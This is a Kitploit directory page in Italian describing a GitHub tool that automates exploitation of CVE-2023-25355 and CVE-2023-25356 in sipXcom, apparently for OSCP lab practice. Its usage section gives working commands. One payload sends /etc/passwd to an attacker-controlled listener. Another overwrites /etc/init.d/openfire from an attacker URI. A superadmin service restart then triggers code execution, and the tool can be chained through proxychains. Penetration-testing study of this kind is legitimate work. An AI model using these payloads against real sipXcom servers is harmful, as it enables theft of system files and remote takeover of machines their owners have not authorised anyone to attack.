Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-25355-25356 — CVE-2023-25355 e CVE-2023-25356 con ricarica automatica del servizio | Kitploit
Strumenti/GitHubGitHub/glefait/cve-2023-25355-25356
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubglefait/cve-2023-25355-25356

CVE-2023-25355-25356

CVE-2023-25355 e CVE-2023-25356 con ricarica automatica del servizio

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit e crediti

L'exploit è stato trovato da [email protected] ed è presentato in due fantastici lavori:

  • articolo full disclosure
  • slide DEFCON31

Un repository per automatizzare ulteriormente questa vulnerabilità è stato pubblicato da Alex Linov:

  • https://github.com/AlexLinov/sipXcom-RCE

Obiettivo

CVE-2023-25355 è un meccanismo di esfiltrazione in cui i file sul server sipXcom vengono caricati su un server web controllato dall'attaccante.

CVE-2023-25356 è un'estensione della prima vulnerabilità in cui i file controllati dall'attaccante possono essere scritti sul filesystem del server sipXcom. Poiché il servizio sipXcom è in grado di sovrascrivere la propria configurazione di init, una shell può quindi essere ottenuta facilmente non appena il servizio viene riavviato.

Il punto interessante da notare qui è che l'utente superadmin di sipXcom è in grado di riavviare questo servizio. Pertanto lo scopo di questo pacchetto è automatizzare completamente il riavvio di questo servizio.

ma perché automatizzarlo completamente?

Per preparare l'OSCP, ci sono laboratori con macchine da compromettere.

In un laboratorio specifico, una macchina soggetta a questa vulnerabilità era/è piuttosto instabile, il che significa che a volte era necessario avviare e ripristinare il laboratorio più volte. Questo è fastidioso. Una volta automatizzato, diventa meno fastidioso.

Requisiti

Hai bisogno di:

  • un server web accessibile dal target in grado di servire e/o ricevere file.
  • python e poetry

Utilizzo

Installazione

root@kitploit:~
poetry install

Poi puoi eseguire lo strumento dall'ambiente attivo, dalla directory corrente o altrove con il nome della CVE:

root@kitploit:~
# se l'ambiente poetry è attivo (poetry shell)
cve_2023_25355 --help

# altrimenti, dalla directory corrente
poetry run cve_2023_25355 --help

# altrimenti da un'altra directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help

CVE-2023-25355

Nell'esempio seguente, inviamo un payload per esfiltrare il file /etc/passwd che verrà caricato su un listener http controllato.

root@kitploit:~
cve_2023_25355 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'

CVE-2023-25356

Nell'esempio seguente, inviamo un payload per sovrascrivere il file /etc/init.d/openfire con il contenuto dell'URI fornito.

root@kitploit:~
cve_2023_25356 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'

Poi, se conosciamo la password del superadmin, possiamo riavviare il servizio per ricaricare la configurazione e attivare qualsiasi gadget.

root@kitploit:~
run sipxcom_service_restart \
    --sipxcom-superuser-username superadmin \
    --sipxcom-superuser-password superadmin_password \
    --sipxcom-website https://1.2.3.4/
    --debug-local-directory /tmp

Combinato con proxychains

root@kitploit:~
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3

Progetto:

  • https://github.com/rofl0r/proxychains-ng
Scarica lo strumento